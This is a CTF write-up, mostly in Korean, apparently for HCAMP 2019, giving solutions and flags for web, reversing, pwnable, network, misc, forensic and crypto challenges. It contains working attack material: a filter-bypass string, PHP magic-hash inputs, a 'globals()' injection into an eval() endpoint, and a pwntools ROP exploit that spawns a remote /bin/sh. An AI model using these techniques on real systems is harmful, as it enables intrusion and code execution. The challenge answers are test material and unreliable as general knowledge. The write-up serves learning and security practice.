Web Hacking
- admin
admin을 입력하면 필터링되어 사라지는 것으로 보아, 필터링을 우회해서 admin이 입력되도록 하면 된다.
하지만, i가 나오면 앞의 내용이 사라지는 것 같아서 애를 먹었다.
admadmiin
HCAMP{rls1004is_so_cute>_<}
- What The Hash
Stage 1
<?php
// Stage 1: solve() runs when the MD5 hex digest of the `hash` query parameter
// loosely equals the constant below.
// NOTE(review): `==` lets PHP compare numeric-looking strings as numbers;
// digest checks belong in hash_equals(), which compares the strings byte for byte.
if (md5($_GET['hash']) == "0800fc577294c34e0b28ad2839435945") { // what the hash?
    solve();
}
?>
hash : hash
Stage 2
<?php
// Stage 2: solve2() runs when the MD5 hex digest of `hash` loosely equals the
// constant below.
// NOTE(review): the constant is 30 characters long while an MD5 hex digest is
// 32, so a string-wise match is impossible; the branch is reachable only
// because `==` reads both "0e<digits>" strings as the number 0. With
// hash_equals() or `===` the comparison would be on the strings themselves.
if (md5($_GET['hash']) == "0e3282358235823234951228234725") { // what the hash ??
    solve2();
}
?>
hash : QNKCDZO
Stage 3
<?php
// Stage 3: both parameters must be present and must not be loosely equal to
// each other; solve3() then runs when their MD5 hex digests are loosely equal.
// NOTE(review): the digest comparison uses `==`, so two different digests that
// both look like "0e<digits>" are compared as numbers (0 == 0) and match.
// hash_equals() compares the digest strings themselves.
if (isset($_GET['hash1'], $_GET['hash2'])) {
    if ($_GET['hash1'] == $_GET['hash2']) {
        echo "what the hash?<br>";
    } elseif (md5($_GET['hash1']) == md5($_GET['hash2'])) { // what the hash !!?
        solve3();
    }
}
?>
hash1 : QNKCDZO
hash2 : 240610708
Stage 4
<?php
// Stage 4: solve4() runs when md5(hash1) loosely equals sha1(hash2).
// NOTE(review): an MD5 hex digest has 32 characters and a SHA-1 hex digest 40,
// so the two can never be equal as strings; the branch is reachable only
// through the numeric interpretation that `==` applies to "0e<digits>" values.
// hash_equals() or `===` would make this comparison always false.
if (isset($_GET['hash1'], $_GET['hash2'])) {
    if (md5($_GET['hash1']) == sha1($_GET['hash2'])) { // what the hash !!???
        solve4();
    }
}
?>
hash1 : 240610708
hash2 : 10932435112
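PHP Magic Hashes 취약점 문제이다. Stage 2~4에서 쓰인 `==`(느슨한 비교)는 양쪽이 모두 숫자 형태의 문자열이면 수로 바꿔서 비교하기 때문에, `0e`로 시작하고 나머지가 전부 숫자인 해시는 모두 0으로 취급되어 서로 같다고 판정된다. 해시를 비교할 때는 `===`나 `hash_equals()`를 써야 이런 일이 생기지 않는다.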
HCAMP{139be1eb99d5bca35eb69e69204950d6}
- Plz solveme
# flag in /flag
from flask import Flask, render_template, request, session, redirect, url_for
from multiprocessing import Process
import re
import time
import shutil
import tempfile
# Flask application object; the route defined below registers on it.
app = Flask(__name__)
# Module-level global holding the flag string. The value here is the
# placeholder from the published source, not the one on the live server.
FLAG = 'flag is HCAMP{flag in real server, this is not flag}'
@app.route('/', methods=['GET'])
def main():
    """Handle ``GET /``: evaluate the ``exp`` query parameter and echo the result.

    Returns 'read source' when ``exp`` is absent, 'No Hack' when ``exp``
    contains any denylisted substring, and otherwise ``exp + ' => ' + res``,
    where ``res`` is ``str(eval(exp))`` or 'error' if evaluation raised.
    """
    exp = request.args.get('exp')
    if exp is None:
        return 'read source'
    # Case-sensitive substring denylist: only these exact fragments are
    # rejected, everything else is passed on to eval() unchanged.
    rm_list = ['system', 'import', 'os', 'exec', 'sys', '__', 'read', 'open', 'flag', 'FLAG']
    for rm in rm_list:
        if rm in exp:
            return 'No Hack'
    res = ''
    try:
        # SECURITY(review): eval() on request data. The expression runs with
        # this module's globals (FLAG among them) and this function's locals
        # in scope, and a substring denylist cannot enumerate every expression
        # that reaches them. Request input should not be evaluated at all;
        # where only literals are needed, ast.literal_eval() is the bounded
        # alternative.
        res = str(eval(exp))
    except:
        # Bare except: every exception, including SystemExit and
        # KeyboardInterrupt, is turned into the string 'error'.
        res = 'error'
    # exp is concatenated into the response body verbatim, without escaping.
    return exp + ' => ' + res
# Starts the built-in server on every interface (0.0.0.0), port 2222, with
# threading enabled. The debug=True argument is commented out, so the
# interactive debugger stays off.
app.run(host='0.0.0.0', port=2222, threaded=True)#, debug=True)
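GET 방식으로 exp 인자의 값을 입력받아 rm_list에 있는 문자열이 들어 있는지 검사한 뒤 eval()로 실행한다. 여기서 FLAG는 전역 변수이다. Python에는 전역 변수를 딕셔너리로 돌려주는 내장 함수가 있고, 이 함수의 이름은 필터에 걸리지 않는다. 이처럼 부분 문자열 차단 목록만으로는 eval()에 들어가는 입력을 안전하게 만들 수 없다.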
globals()
HCAMP{please_solve_laeasy_judge!!}
Reversing
- Easy_Mips
def main():
    """Decode the embedded string with a repeating XOR key and print it."""
    data = "KA@NRzp2^F6rz]S0t2qqhme|"
    # The key for position i is 3 - i % 3, i.e. 3, 2, 1, 3, 2, 1, ...
    flag = "".join(chr(ord(ch) ^ (3 - pos % 3)) for pos, ch in enumerate(data))
    print(flag)


if __name__ == "__main__":
    main()
HCAMP{s0_E4sy_R3v3rsing}
- Unicorn
import base64
# The encoded text is split into four Base64 fragments of 12 characters each.
# The first three are stored as character codes; the second is additionally
# XORed with 0x10.
FirstData = [83, 69, 78, 66, 84, 86, 66, 55, 85, 71, 86, 110]
one = "".join(map(chr, FirstData))

SecondData = [0x49, 0x48, 0x5e, 0x21, 0x73, 0x6a, 0x28, 0x3b, 0x40, 0x55, 0x25, 0x66]
# Undo the XOR in place, so SecondData ends up holding the decoded codes.
SecondData[:] = [code ^ 0x10 for code in SecondData]
two = "".join(map(chr, SecondData))

ThirdData = [73, 83, 69, 104, 73, 85, 66, 65, 80, 68, 53, 86]
three = "".join(map(chr, ThirdData))

four = "bmlDb3JOKip9"

# Every fragment length is a multiple of 4, so the concatenation is itself
# valid Base64 and can be decoded in one call.
print(base64.b64decode(one + two + three + four))
- Can U Login?
import sys
import base64
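def main():
    """Print the ID and password recovered from the constants below.

    The ID is a Base64 string. Each password byte is the matching ``s2`` byte
    XORed first with 0x22 and then with a per-index key.
    """
    Encoded_ID = "SENBTVAyMDE5"
    # b64decode() returns bytes on Python 3, where "str + bytes" raises
    # TypeError; decoding first keeps the concatenation valid on 2 and 3.
    ID = base64.b64decode(Encoded_ID).decode("ascii")
    print("ID >> " + ID)

    s2 = [0x65, 0x7A, 0x4D, 0x70, 0x38, 0x1A, 0x70, 0x43, 0x18, 0x28, 0x20, 0x34, 0x63, 0x2D]
    # Second-stage XOR keys in index order 0..13 (the original assigned them
    # one element at a time, in shuffled order).
    keys = [0x64, 0x33, 0x30, 0x39, 0x23, 0x5f, 0x31, 0x31, 0x69, 0x61, 0x6B, 0x67, 0x31, 0x2c]
    # 0x22 is the first-stage key; the original author's note on that line
    # read "input : 0T!dsfadfsa => 0x22".
    pw2 = "".join(chr(byte ^ 0x22 ^ key) for byte, key in zip(s2, keys))
    print("PW>>" + pw2)


if __name__ == "__main__":
    main()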
ID >> HCAMP2019
PW>>#k_k9gcPSkiqp#
HCAMP{D0_not_Duplicated_p4ssword}
Pwnable
- ucanfind
from pwn import *
# Load the challenge binary so its symbols (the GOT entry for read, the .bss
# address) can be looked up when the payload is built.
e = ELF('ucanfind_16eb51348c4b4ac893a5c25f7af20ad8')
# Open a TCP connection to the challenge service.
p = remote("kshgroup.kr", 19192)
# Blocks until Enter is pressed. raw_input is a Python 2 builtin, so the
# script targets Python 2 (presumably a pause before anything is sent; confirm).
raw_input(">>> ")
# Hard-coded code addresses inside the binary. The instructions found at each
# address are not shown on this page.
gadget1 = 0x4007a6
gadget2 = 0x400790
syscall = 0x40068f
def chain(faddr, arg1, arg2, arg3):
    """Return one 64-byte frame: 8 filler bytes plus seven packed 64-bit values.

    The packed values are, in order: 0, 1, faddr, arg3, arg2, arg1 and the
    module-level ``gadget2`` address. Note that the three arguments are laid
    out in reverse order.
    """
    frame = ['B' * 8]
    frame.extend(p64(value) for value in (0, 1, faddr, arg3, arg2, arg1, gadget2))
    return ''.join(frame)
# First message: 1032 filler bytes, then the packed gadget1 address. The
# offset is specific to the challenge binary, which is not shown on this page.
payload = "A"*1032
payload += p64(gadget1)
# Frame 1: the GOT entry of read with the values (0, e.bss(), 59).
payload += chain(e.got['read'], 0, e.bss(), 59)
# Frame 2: the address e.bss() with the values (e.bss()+8, 0, 0).
payload += chain(e.bss(), e.bss()+8, 0, 0)
# Second message: the packed `syscall` address (8 bytes), then the
# NUL-terminated string "/bin/sh", zero-padded to exactly 59 bytes, the same
# number that frame 1 passes as its third value.
payload2 = p64(syscall)
payload2 += "/bin/sh\x00"
payload2 += "\x00"*(59-len(payload2))
# Wait for the service's prompt (it ends with ": ") before sending.
p.readuntil(": ")
p.send(payload)
# Half-second pauses keep the two messages from being sent back to back.
sleep(0.5)
p.send(payload2)
sleep(0.5)
# Hand the connection over to the terminal.
p.interactive()
HCAMP{y0ud1d_a_re4lly_n1ce_job@@++}
Network
- 나는 언젠가 플래그를 보았다.
flag.xps 라는 파일의 패킷을 발견했다
flag.xps 파일을 다운받아 확장자를 .zip 으로 바꾸어 보면 Resources -> Images -> image_0.png 라는 파일이 있다.
HCAMP{Oh_My_G0ddess!@!@@@!}
Misc
- Where….?!?!?
사진에 보이는 간판을 검색하여 플래그를 찾으면 된다.
HCAMP{dnjfemzjqqnrfh54rlf}
- 아아 뫄위쿠 퉤수투
Base64 디코딩을 계속하면 된다.
HCAMP{B4se64_x_30@@_XD}
- 더 풀래구 줴눼뤠위퉈
from pwn import *
import string
import time
# Builds a config object one key at a time. For key `count`, values 0..124 are
# tried until the service's "Check" number reaches count + 1; the accepted
# "key":value pair is then kept for all following requests.
# The reply format is not shown on the page; the markers 'Flag', 'Check' and
# '/' and the slice offsets (1 and +8) are taken over from the original script.
nc = remote('kshgroup.kr', 19191)
send_data = ''
for count in range(21):
    for i in range(125):
        candidate = '"{}":{}'.format(count, i)
        nc.sendline('{' + send_data + candidate + '}')
        nc.recvuntil('Your flag is')
        result = nc.recv()
        result = result.replace('Input your generator config >', '').replace('\n', '')
        flag = result[1:result.index('Flag')]
        check = result[result.index('Check') + 8:result.index('/')]
        print(flag)
        if int(check) != count + 1:
            continue
        # This value was accepted: keep it and move on to the next key.
        send_data += candidate + ','
        break
HCAMP{B33P_B33P@@_Fla9_Fl4g}
Forensic
양념 친구들!
HCAMP{H3ll04PN9!!}
YOU_MUST_LOGOFF
HCAMP{Waterman_.c0ll1iy_198702190905}
태보의 저주
HCAMP{taebo_hae!}
Crypto
- genius_brain
Base64 -> hex -> string
HCAMP{FuUUUUUUUUUUUUUc7F!#@$}